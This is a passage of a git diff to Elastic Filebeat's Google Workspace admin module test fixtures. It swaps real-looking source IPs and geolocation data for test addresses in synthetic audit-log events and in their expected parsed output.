+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"EMAIL_LOG_SEARCH\",\"parameters\":[{\"name\":\"EMAIL_LOG_SEARCH_END_DATE\",\"value\":\"2020/07/28 04:59:59 UTC\"},{\"name\":\"EMAIL_LOG_SEARCH_MSG_ID\",\"value\":\"id\"},{\"name\":\"EMAIL_LOG_SEARCH_RECIPIENT\",\"value\":\"recipient\"},{\"name\":\"EMAIL_LOG_SEARCH_SENDER\",\"value\":\"sender\"},{\"name\":\"EMAIL_LOG_SEARCH_SMTP_RECIPIENT_IP\",\"value\":\"89.160.20.156\"},{\"name\":\"EMAIL_LOG_SEARCH_SMTP_SENDER_IP\",\"value\":\"89.160.20.156\"},{\"name\":\"EMAIL_LOG_SEARCH_START_DATE\",\"value\":\"2002-10-02T10:00:00Z\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "info"
@@ -70,35 +66,31 @@
         "google_workspace.actor.type": "USER",
         "google_workspace.admin.email.log_search_filter.end_date": "2020-07-28T04:59:59.000Z",
         "google_workspace.admin.email.log_search_filter.message_id": "id",
-        "google_workspace.admin.email.log_search_filter.recipient.ip": "1.1.1.1",
+        "google_workspace.admin.email.log_search_filter.recipient.ip": "89.160.20.156",
         "google_workspace.admin.email.log_search_filter.recipient.value": "recipient",
-        "google_workspace.admin.email.log_search_filter.sender.ip": "1.1.1.1",
+        "google_workspace.admin.email.log_search_filter.sender.ip": "89.160.20.156",
         "google_workspace.admin.email.log_search_filter.sender.value": "sender",
         "google_workspace.admin.email.log_search_filter.start_date": "2002-10-02T10:00:00.000Z",
         "google_workspace.event.type": "EMAIL_SETTINGS",
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 432,
+        "log.offset": 431,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -121,7 +113,7 @@
         "event.end": "2002-10-02T12:00:00.000Z",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"EMAIL_UNDELETE\",\"parameters\":[{\"name\":\"END_DATE\",\"value\":\"2002-10-02T12:00:00Z\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"START_DATE\",\"value\":\"2002-10-02T10:00:00Z\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"EMAIL_UNDELETE\",\"parameters\":[{\"name\":\"END_DATE\",\"value\":\"2002-10-02T12:00:00Z\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"START_DATE\",\"value\":\"2002-10-02T10:00:00Z\"}]}}",
         "event.provider": "admin",
         "event.start": "2002-10-02T10:00:00.000Z",
         "event.type": [
@@ -134,27 +126,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 1188,
+        "log.offset": 1198,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -179,7 +167,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"CHANGE_EMAIL_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"CHANGE_EMAIL_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -198,26 +186,22 @@
         "group.domain": "example.com",
         "group.name": "group",
         "input.type": "log",
-        "log.offset": 1671,
+        "log.offset": 1680,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -239,7 +223,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"CHANGE_GMAIL_SETTING\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_DESCRIPTION\",\"value\":\"setting description\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"USER_DEFINED_SETTING_NAME\",\"value\":\"setting name\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"CHANGE_GMAIL_SETTING\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_DESCRIPTION\",\"value\":\"setting description\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"USER_DEFINED_SETTING_NAME\",\"value\":\"setting name\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -254,26 +238,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 2254,
+        "log.offset": 2262,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -295,7 +275,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"CREATE_GMAIL_SETTING\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_DESCRIPTION\",\"value\":\"setting description\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"USER_DEFINED_SETTING_NAME\",\"value\":\"setting name\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"CREATE_GMAIL_SETTING\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_DESCRIPTION\",\"value\":\"setting description\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"USER_DEFINED_SETTING_NAME\",\"value\":\"setting name\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "creation"
@@ -310,26 +290,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 2792,
+        "log.offset": 2799,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -351,7 +327,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"DELETE_GMAIL_SETTING\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_DESCRIPTION\",\"value\":\"setting description\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"USER_DEFINED_SETTING_NAME\",\"value\":\"setting name\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"DELETE_GMAIL_SETTING\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_DESCRIPTION\",\"value\":\"setting description\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"USER_DEFINED_SETTING_NAME\",\"value\":\"setting name\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "deletion"
@@ -366,26 +342,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 3330,
+        "log.offset": 3336,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -406,7 +378,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"REJECT_FROM_QUARANTINE\",\"parameters\":[{\"name\":\"EMAIL_LOG_SEARCH_MSG_ID\",\"value\":\"id\"},{\"name\":\"QUARANTINE_NAME\",\"value\":\"quarantine\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"REJECT_FROM_QUARANTINE\",\"parameters\":[{\"name\":\"EMAIL_LOG_SEARCH_MSG_ID\",\"value\":\"id\"},{\"name\":\"QUARANTINE_NAME\",\"value\":\"quarantine\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -419,26 +391,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 3868,
+        "log.offset": 3873,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -459,7 +427,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"RELEASE_FROM_QUARANTINE\",\"parameters\":[{\"name\":\"EMAIL_LOG_SEARCH_MSG_ID\",\"value\":\"id\"},{\"name\":\"QUARANTINE_NAME\",\"value\":\"quarantine\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"RELEASE_FROM_QUARANTINE\",\"parameters\":[{\"name\":\"EMAIL_LOG_SEARCH_MSG_ID\",\"value\":\"id\"},{\"name\":\"QUARANTINE_NAME\",\"value\":\"quarantine\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -472,26 +440,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 4302,
+        "log.offset": 4306,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-groups-test.json.log b/x-pack/filebeat/module/google_workspace/admin/test/admin-groups-test.json.log
index 2c60ded89cc1..2df4744cd6e4 100644
--- a/x-pack/filebeat/module/google_workspace/admin/test/admin-groups-test.json.log
+++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-groups-test.json.log
@@ -1,14 +1,14 @@
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"GROUP_SETTINGS","name":"CREATE_GROUP","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"GROUP_SETTINGS","name":"DELETE_GROUP","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"GROUP_SETTINGS","name":"CHANGE_GROUP_DESCRIPTION","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"GROUP_SETTINGS","name":"GROUP_LIST_DOWNLOAD"}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"GROUP_SETTINGS","name":"ADD_GROUP_MEMBER","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"GROUP_SETTINGS","name":"REMOVE_GROUP_MEMBER","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"GROUP_SETTINGS","name":"UPDATE_GROUP_MEMBER","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"GROUP_SETTINGS","name":"UPDATE_GROUP_MEMBER_DELIVERY_SETTINGS","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"GROUP_SETTINGS","name":"UPDATE_GROUP_MEMBER_DELIVERY_SETTINGS_CAN_EMAIL_OVERRIDE","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"GROUP_SETTINGS","name":"GROUP_MEMBER_BULK_UPLOAD","parameters":[{"name":"GROUP_MEMBER_BULK_UPLOAD_FAILED_NUMBER","value":"0"},{"name":"GROUP_MEMBER_BULK_UPLOAD_TOTAL_NUMBER","value":"10"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"GROUP_SETTINGS","name":"GROUP_MEMBERS_DOWNLOAD"}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"GROUP_SETTINGS","name":"CHANGE_GROUP_NAME","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"GROUP_SETTINGS","name":"CHANGE_GROUP_SETTING","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"SETTING_NAME","value":"setting"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"GROUP_SETTINGS","name":"WHITELISTED_GROUPS_UPDATED","parameters":[{"name":"WHITELISTED_GROUPS","value":"a,b,c"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"GROUP_SETTINGS","name":"CREATE_GROUP","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"}]}}
